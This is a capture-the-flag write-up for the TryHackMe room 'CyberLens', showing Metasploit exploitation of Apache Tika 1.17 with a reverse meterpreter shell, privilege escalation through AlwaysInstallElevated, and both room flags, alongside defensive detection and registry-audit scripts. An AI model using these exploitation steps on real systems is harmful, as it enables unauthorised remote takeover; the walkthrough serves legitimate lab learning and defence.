Introduction
This post is a writeup and personal notes for "CyberLens", an Easy-rated room on TryHackMe.
※ Depending on how it is used, the material here can break the law. Do not misuse it.
Task1 CyberLens
As the task itself says, start by mapping the machine to a hostname in /etc/hosts. The task gives the command as:
sudo echo 'MACHINE_IP cyberlens.thm' >> /etc/hosts
Note that this form does not actually work: sudo elevates only echo, while the >> redirection is performed by the unprivileged shell, so the write to /etc/hosts is denied. Pipe into tee instead (replace MACHINE_IP with the IP of the deployed machine):
echo 'MACHINE_IP cyberlens.thm' | sudo tee -a /etc/hosts
Then run a port scan.
┌──(kali㉿kali)-[~]
└─$ nmap -Pn -T4 10.10.69.230
Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-25 07:31 EDT
Nmap scan report for 10.10.69.230
Host is up (0.26s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT     STATE SERVICE
80/tcp   open  http
135/tcp  open  msrpc
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
3389/tcp open  ms-wbt-server

Nmap done: 1 IP address (1 host up) scanned in 15.89 seconds
While exploring the site I found a file uploader. Checking the source code around it revealed an endpoint, so I accessed it.
An Apache Tika 1.17 page was displayed. Apparently this "Apache Tika 1.17" is vulnerable: tika-server up to 1.17 lets a client inject commands through crafted HTTP headers (CVE-2018-1335), which is exactly what the Metasploit module used below exploits.
One thing worth noting: the Tika server listens on TCP 61777 (the RPORT value in the module options below). That port is outside the 1000 most common ports that the nmap run above covers by default, which is why it does not appear in the scan results and had to be found through the page source. A full port scan (nmap -p-) would have listed it directly.
Reference site
The reference site points to a Metasploit module, so I use it.
Launch Metasploit, search for the same module as on the reference site, and select it.
msfconsole
msf6 > search apache_tika

Matching Modules
================

   #  Name                                          Disclosure Date  Rank       Check  Description
   -  ----                                          ---------------  ----       -----  -----------
   0  exploit/windows/http/apache_tika_jp2_jscript  2018-04-25       excellent  Yes    Apache Tika Header Command Injection


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/apache_tika_jp2_jscript

msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) >
To run this module, set the IP address and port information.
LHOST is the attacker's address (where the reverse shell connects back to), RHOSTS is the target's IP address, and RPORT is the target port; here RPORT must be changed to 61777, where the Tika server was found, rather than left at the default.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options

Module options (exploit/windows/http/apache_tika_jp2_jscript):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.69.230     yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT      61777            yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The base path to the web application
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.8.59.30       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.
Once the settings are in place, run the exploit.
Even with correct settings it sometimes fails (the session never opens, or opens and immediately dies); if that happens, simply run it again.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > exploit
[*] Started reverse TCP handler on 10.8.59.30:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.69.230:61777/meta
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Sending stage (175686 bytes) to 10.10.69.230
[*] Meterpreter session 1 opened (10.8.59.30:4444 -> 10.10.69.230:49852) at 2024-09-25 08:31:11 -0400
meterpreter >
When the meterpreter > prompt appears, the exploit has succeeded.
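Seen from the defender's side, the most visible trace of the run above is the command stager: 13 PUT requests to /meta on the Tika server port, all from one client, in quick succession. The following is an added example (not code from the room, the original post, or Metasploit) that turns that observation into a simple detection. It assumes a reverse proxy or WAF in front of tika-server writing combined-format access logs, since tika-server does not produce such a log by itself. The log lines, IP addresses and timestamps embedded below are constructed for the demo, and the threshold and window size are assumptions to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Combined-log-format line from a reverse proxy placed in front of tika-server (assumption).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) \S+" (?P<status>\d{3}) \S+'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return the fields we need from one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FMT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],
        "status": int(m["status"]),
    }


def find_stager_bursts(lines, threshold=5, window_s=60):
    """Return {client_ip: max_requests_in_window} for clients that issued at least
    `threshold` PUT /meta requests inside any `window_s`-second sliding window.

    A burst like this is what the Metasploit command stager produced in the
    writeup (13 PUTs to /meta back to back). One legitimate metadata extraction
    is one PUT, so a burst from a single client is a strong signal, not proof.
    """
    put_times = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "PUT" and rec["path"] == "/meta":
            put_times[rec["ip"]].append(rec["ts"])

    hits = {}
    for ip, times in put_times.items():
        times.sort()
        start = 0
        best = 0
        for end, t in enumerate(times):
            # Slide the window start forward until the span fits inside window_s.
            while (t - times[start]).total_seconds() > window_s:
                start += 1
            best = max(best, end - start + 1)
        if best >= threshold:
            hits[ip] = best
    return hits


# Constructed sample log (not captured from the room): 198.51.100.7 behaves like the
# command stager, 192.0.2.10 is an ordinary client extracting metadata twice.
SAMPLE_LOG = """\
198.51.100.7 - - [25/Sep/2024:08:30:40 -0400] "GET / HTTP/1.1" 200 1843
198.51.100.7 - - [25/Sep/2024:08:30:41 -0400] "PUT /meta HTTP/1.1" 200 112
198.51.100.7 - - [25/Sep/2024:08:30:42 -0400] "PUT /meta HTTP/1.1" 200 112
198.51.100.7 - - [25/Sep/2024:08:30:43 -0400] "PUT /meta HTTP/1.1" 200 112
198.51.100.7 - - [25/Sep/2024:08:30:44 -0400] "PUT /meta HTTP/1.1" 200 112
198.51.100.7 - - [25/Sep/2024:08:30:45 -0400] "PUT /meta HTTP/1.1" 200 112
198.51.100.7 - - [25/Sep/2024:08:30:46 -0400] "PUT /meta HTTP/1.1" 200 112
192.0.2.10 - - [25/Sep/2024:08:10:05 -0400] "PUT /meta HTTP/1.1" 200 344
192.0.2.10 - - [25/Sep/2024:08:25:17 -0400] "PUT /meta HTTP/1.1" 200 298
not a log line
"""

if __name__ == "__main__":
    for ip, n in find_stager_bursts(SAMPLE_LOG.splitlines()).items():
        print(f"possible Tika command stager from {ip}: {n} PUT /meta requests within 60s")
```

The rate heuristic is deliberately header-agnostic because the combined log format does not record request headers; if the proxy logs them, matching on the X-Tika-OCR* headers that this class of exploit abuses gives a much more specific rule. Either way, the real fix is upgrading tika-server past 1.17 and not exposing it to untrusted clients at all.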
What is the user flag?
Start a shell.
meterpreter > shell
Process 5980 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows>
Now look for the user flag.
Assuming it is stored in a text file, I search for files with ".txt" in their name.
C:\Windows\system32>tree c:\users
tree c:\users
Folder PATH listing
Volume serial number is A8A4-C362
C:\USERS
├───Administrator
├───CyberLens
│   ├───3D Objects
│   ├───Contacts
│   ├───Desktop
│   ├───Documents
│   │   └───Management
│   ├───Downloads
│   ├───Favorites
│   │   └───Links
│   ├───Links
│   ├───Music
│   ├───Pictures
│   ├───Saved Games
│   ├───Searches
│   └───Videos
└───Public
    ├───Documents
    ├───Downloads
    ├───Music
    ├───Pictures
    └───Videos
C:\Windows\system32>dir C:\USERS\CyberLens\*.txt* /s
dir C:\USERS\CyberLens\*.txt* /s
Volume in drive C has no label.
...
Directory of C:\USERS\CyberLens\Desktop
06/06/2023 07:54 PM 25 user.txt
1 File(s) 25 bytes
Directory of C:\USERS\CyberLens\Documents\Management
...
C:\Windows\system32>
Now that the location of user.txt is known, display its contents to get the flag. cat is not a cmd.exe command (the stray cat line below is a leftover from trying it and produced nothing), so more (or type) is used instead.
cat C:\USERS\CyberLens\Desktop\user.txt
C:\Windows\system32>more C:\USERS\CyberLens\Desktop\user.txt
more C:\USERS\CyberLens\Desktop\user.txt
THM{T1k4-CV3-f0r-7h3-w1n}
C:\Windows\system32>
What is the admin flag?
Next, hunt for the administrator flag.
Use the background command to return to msf and run the Local Exploit Suggester post module, which runs the check method of Metasploit's local exploit modules against the session's host and lists the ones that appear to apply.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > search exploit suggester

Matching Modules
================

   #  Name                                      Disclosure Date  Rank    Check  Description
   -  ----                                      ---------------  ----    -----  -----------
   0  post/multi/recon/local_exploit_suggester                   normal  No     Multi Recon Local Exploit Suggester


Interact with a module by name or index. For example info 0, use 0 or use post/multi/recon/local_exploit_suggester

msf6 exploit(windows/http/apache_tika_jp2_jscript) > [*] 10.10.69.230 - Meterpreter session 2 closed.  Reason: Died
[*] 10.10.69.230 - Meterpreter session 3 closed.  Reason: Died
msf6 exploit(windows/http/apache_tika_jp2_jscript) >
Next, select the suggester module and point its SESSION option at a live meterpreter session. Sessions 2 and 3 died in the meantime and session 1 (used for the user flag) no longer appears in the session list, so one of the live sessions from re-running the exploit, session 4, is used here.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use 0
msf6 post(multi/recon/local_exploit_suggester) >
msf6 exploit(windows/http/apache_tika_jp2_jscript) > sessions
Active sessions
===============

  Id  Name  Type                     Information                      Connection
  --  ----  ----                     -----------                      ----------
  4         meterpreter x86/windows  CYBERLENS\CyberLens @ CYBERLENS  10.8.59.30:4444 -> 10.10.69.230:49874 (10.10.69.230)
  5         meterpreter x86/windows  CYBERLENS\CyberLens @ CYBERLENS  10.8.59.30:4444 -> 10.10.69.230:49873 (10.10.69.230)
msf6 post(multi/recon/local_exploit_suggester) > set session 4
session => 4
Running it lists the local exploit modules whose check reports the host as potentially vulnerable.
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.69.230 - Collecting local exploits for x86/windows...
[*] 10.10.69.230 - 174 exploit checks are being tried...
[+] 10.10.69.230 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.69.230 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.69.230 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.69.230 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 41 / 41
[*] 10.10.69.230 - Valid modules for session 4:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/always_install_elevated                  Yes                      The target is vulnerable.
 2   exploit/windows/local/cve_2020_1048_printerdemon               Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_1337_printerdemon               Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
This time I use exploit/windows/local/always_install_elevated. It works because the AlwaysInstallElevated policy is enabled on the host: that policy tells Windows Installer to run any .msi package with elevated privileges even when a standard user launches it, so the module simply uploads an MSI that spawns a payload. The policy only takes effect when the AlwaysInstallElevated DWORD value is 1 under both HKLM and HKCU in Software\Policies\Microsoft\Windows\Installer, which is what the suggester's check confirmed.
Each module has its own SESSION option, so set the session again and run it.
msf6 post(multi/recon/local_exploit_suggester) > use 1
msf6 exploit(windows/local/always_install_elevated) > options

Module options (exploit/windows/local/always_install_elevated):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.8.59.30       yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows



View the full module info with the info, or info -d command.
msf6 exploit(windows/local/always_install_elevated) > set session 4
session => 4
Running the exploit picked out by the suggester opens a new session (6) with elevated privileges. Note that whoami is a cmd.exe command, not a meterpreter one (the meterpreter equivalent is getuid), which is why no output follows it below; the C:\Users\Administrator> prompt in the subsequent listing shows the shell working inside the Administrator profile.
msf6 exploit(windows/local/always_install_elevated) > exploit
[*] Started reverse TCP handler on 10.8.59.30:4444
[*] Uploading the MSI to C:\Users\CYBERL~1\AppData\Local\Temp\1\nrEysarn.msi ...
[*] Executing MSI...
[*] Sending stage (175686 bytes) to 10.10.69.230
[+] Deleted C:\Users\CYBERL~1\AppData\Local\Temp\1\nrEysarn.msi
[*] Meterpreter session 6 opened (10.8.59.30:4444 -> 10.10.69.230:49876) at 2024-09-25 10:05:28 -0400
meterpreter > whoami
Finally, search for the administrator flag the same way as the user flag, and read it.
C:\Users\Administrator>dir C:\USERS\Administrator\*.txt* /s
dir C:\USERS\Administrator\*.txt* /s
Volume in drive C has no label.
...
11/27/2023 07:50 PM 24 admin.txt
1 File(s) 24 bytes
Total Files Listed:
26 File(s) 1,733,499 bytes
0 Dir(s) 14,915,297,280 bytes free
C:\Users\Administrator>more Desktop\admin.txt
more Desktop\admin.txt
THM{3lev@t3D-4-pr1v35c!}
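The privilege escalation above depends on one misconfiguration, and the same check the Metasploit module runs is worth having as a stand-alone audit: the AlwaysInstallElevated value must be REG_DWORD 0x1 in both the HKLM and the HKCU policy key, otherwise Windows Installer ignores it. The following is an added example, not code from the room, the original post or Metasploit. It parses the text that reg query prints and reports the policy as enabled only when both hives hold 1. The sample reg query outputs embedded below are constructed, not captured from the room's machine; the live query (query_hive) only runs on Windows, everything else works offline.

```python
import re
import subprocess
import sys

INSTALLER_KEY = r"SOFTWARE\Policies\Microsoft\Windows\Installer"
# One value line as reg.exe prints it:  "    AlwaysInstallElevated    REG_DWORD    0x1"
VALUE_RE = re.compile(r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+0x([0-9A-Fa-f]+)\s*$", re.M)


def value_from_reg_output(output):
    """Return the AlwaysInstallElevated DWORD parsed from `reg query` text,
    or None when the value (or the whole key) is absent."""
    m = VALUE_RE.search(output)
    return int(m.group(1), 16) if m else None


def policy_enabled(hklm_output, hkcu_output):
    """Windows Installer honours AlwaysInstallElevated only when the value is 1
    in BOTH the machine (HKLM) and the user (HKCU) policy keys; anything else
    (0, or missing in either hive) leaves MSI installs running as the caller."""
    return (value_from_reg_output(hklm_output) == 1
            and value_from_reg_output(hkcu_output) == 1)


def query_hive(hive):
    """Run reg.exe for one hive (Windows only). A missing key makes reg.exe
    exit non-zero with an error on stderr and nothing on stdout, which
    value_from_reg_output then treats as 'not set'."""
    proc = subprocess.run(
        ["reg", "query", f"{hive}\\{INSTALLER_KEY}", "/v", "AlwaysInstallElevated"],
        capture_output=True, text=True, check=False,
    )
    return proc.stdout


# Constructed sample outputs in reg.exe's format (not captured from the room's machine).
SAMPLE_HKLM_ON = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
SAMPLE_HKCU_ON = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1

"""
SAMPLE_HKCU_OFF = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x0

"""
SAMPLE_MISSING = ""  # what query_hive returns when the key does not exist


if __name__ == "__main__":
    if sys.platform == "win32":
        hklm, hkcu = query_hive("HKLM"), query_hive("HKCU")
    else:
        hklm, hkcu = SAMPLE_HKLM_ON, SAMPLE_HKCU_ON  # offline demo with the constructed samples
    print("HKLM:", value_from_reg_output(hklm), "HKCU:", value_from_reg_output(hkcu))
    print("AlwaysInstallElevated exploitable:", policy_enabled(hklm, hkcu))
```

On a real host the fix is to set the Group Policy "Always install with elevated privileges" to Disabled under both Computer Configuration and User Configuration (or delete the two values), after which always_install_elevated's check no longer reports the target as vulnerable.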
Closing
That's all for this room.